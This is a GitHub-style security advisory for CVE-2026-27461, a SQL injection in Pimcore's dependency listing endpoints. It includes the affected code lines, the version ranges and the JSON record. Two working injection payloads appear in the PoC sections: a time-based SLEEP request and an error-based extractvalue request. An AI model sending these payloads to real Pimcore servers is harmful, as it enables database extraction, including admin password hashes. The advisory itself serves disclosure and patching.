GHSA-VXG3-V4P6-F3FP
Vulnerability from github – Published: 2026-02-24 20:03 – Updated: 2026-02-24 20:03The filter query parameter in the dependency listing endpoints is JSON-decoded and the value field is concatenated directly into RLIKE clauses without sanitization or parameterized queries.
Affected code in models/Dependency/Dao.php: - getFilterRequiresByPath() lines 90, 95, 100 - getFilterRequiredByPath() lines 148, 153, 158
All 6 locations use direct string concatenation like:
"AND LOWER(CONCAT(o.path, o.key)) RLIKE '".$value."'"
Note that $orderBy and $orderDirection in the same methods (lines 75-81) ARE properly whitelist-validated, but $value has zero sanitization.
Entry points (pimcore/admin-ui-classic-bundle ElementController.php): - GET /admin/element/get-requires-dependencies (line 654) - GET /admin/element/get-required-by-dependencies (line 714)
The controller JSON-decodes the filter query param and passes $filter['value'] straight to the Dao without any escaping.
PoC (time-based blind):
GET /admin/element/get-requires-dependencies?id=1&elementType=document&filter=[{"type":"string","value":"x' OR SLEEP(5)#"}]
If vulnerable, the response is delayed by ~15 seconds (SLEEP runs 3 times, once per UNION arm in the inner subquery).
PoC (error-based extraction):
GET /admin/element/get-requires-dependencies?id=1&elementType=document&filter=[{"type":"string","value":"x' OR extractvalue(1,concat(0x7e,(SELECT version())))#"}]
Returns the MySQL version string in the error response.
Requires admin authentication. An attacker with admin panel access can extract the full database including password hashes of other admin users.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "pimcore/pimcore"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "11.5.14.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "pimcore/pimcore"
},
"ranges": [
{
"events": [
{
"introduced": "12.0.0"
},
{
"fixed": "12.3.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27461"
],
"database_specific": {
"cwe_ids": [
"CWE-89"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-24T20:03:23Z",
"nvd_published_at": "2026-02-24T04:15:58Z",
"severity": "MODERATE"
},
"details": "The filter query parameter in the dependency listing endpoints is JSON-decoded and the value field is concatenated directly into RLIKE clauses without sanitization or parameterized queries.\n\nAffected code in models/Dependency/Dao.php:\n- getFilterRequiresByPath() lines 90, 95, 100\n- getFilterRequiredByPath() lines 148, 153, 158\n\nAll 6 locations use direct string concatenation like:\n\n \"AND LOWER(CONCAT(o.path, o.key)) RLIKE \u0027\".$value.\"\u0027\"\n\nNote that $orderBy and $orderDirection in the same methods (lines 75-81) ARE properly whitelist-validated, but $value has zero sanitization.\n\nEntry points (pimcore/admin-ui-classic-bundle ElementController.php):\n- GET /admin/element/get-requires-dependencies (line 654)\n- GET /admin/element/get-required-by-dependencies (line 714)\n\nThe controller JSON-decodes the filter query param and passes $filter[\u0027value\u0027] straight to the Dao without any escaping.\n\nPoC (time-based blind):\n\n GET /admin/element/get-requires-dependencies?id=1\u0026elementType=document\u0026filter=[{\"type\":\"string\",\"value\":\"x\u0027 OR SLEEP(5)#\"}]\n\nIf vulnerable, the response is delayed by ~15 seconds (SLEEP runs 3 times, once per UNION arm in the inner subquery).\n\nPoC (error-based extraction):\n\n GET /admin/element/get-requires-dependencies?id=1\u0026elementType=document\u0026filter=[{\"type\":\"string\",\"value\":\"x\u0027 OR extractvalue(1,concat(0x7e,(SELECT version())))#\"}]\n\nReturns the MySQL version string in the error response.\n\nRequires admin authentication. An attacker with admin panel access can extract the full database including password hashes of other admin users.",
"id": "GHSA-vxg3-v4p6-f3fp",
"modified": "2026-02-24T20:03:23Z",
"published": "2026-02-24T20:03:23Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pimcore/pimcore/security/advisories/GHSA-vxg3-v4p6-f3fp"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27461"
},
{
"type": "WEB",
"url": "https://github.com/pimcore/pimcore/pull/18991"
},
{
"type": "WEB",
"url": "https://github.com/pimcore/pimcore/commit/1c3925fbec4895abeb21e5c244a83679c4e4a6f4"
},
{
"type": "PACKAGE",
"url": "https://github.com/pimcore/pimcore"
},
{
"type": "WEB",
"url": "https://github.com/pimcore/pimcore/releases/tag/v12.3.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Pimcore vulnerable to SQL injection via unsanitized filter value in Dependency Dao RLIKE clause"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.